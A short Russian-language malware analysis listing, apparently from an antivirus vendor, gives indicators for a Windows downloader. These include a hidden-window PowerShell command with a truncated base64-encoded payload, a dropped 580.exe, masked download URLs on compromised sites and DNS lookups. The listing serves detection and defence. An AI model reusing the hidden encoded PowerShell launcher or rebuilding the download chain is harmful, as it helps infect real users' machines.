Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAGcAeQBnAGIAawBsAGgAcABvAGkAZgA9ACcARQB1AGMAYwBnAHkAZgBmAGMAeQAnADsAJABEAGEAYgBkAG0AcQB1AG0AYQBkACAAPQAgACcANQA4ADAAJwA7ACQATwBxAGkAYwBlAHgAbQBiAHEAeABrAGcAYgA9ACcAVwBwAHMAdwB...
- %HOMEPATH%\580.exe
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\580.exe
- 'ce###nsri.com':80
- http://jo######lesdental.com.au/wp-content/6DVi/
- http://jo######lesdental.com.au/cgi-sys/suspendedpage.cgi
- http://www.ko###oubi.org/wp-includes/hiLAx/
- http://ma######ev.herokuapp.com/wp-includes/msuft/
- DNS ASK cx##t.com
- DNS ASK jo######lesdental.com.au
- DNS ASK ko###oubi.org
- DNS ASK ma######ev.herokuapp.com
- DNS ASK ce###nsri.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAGcAeQBnAGIAawBsAGgAcABvAGkAZgA9ACcARQB1AGMAYwBnAHkAZgBmAGMAeQAnADsAJABEAGEAYgBkAG0AcQB1AG0AYQBkACAAPQAgACcANQA4ADAAJwA7ACQATwBxAGkAYwBlAHgAbQBiAHEAeABrAGcAYgA9ACcAVwBwAHMAdwB...' (со скрытым окном)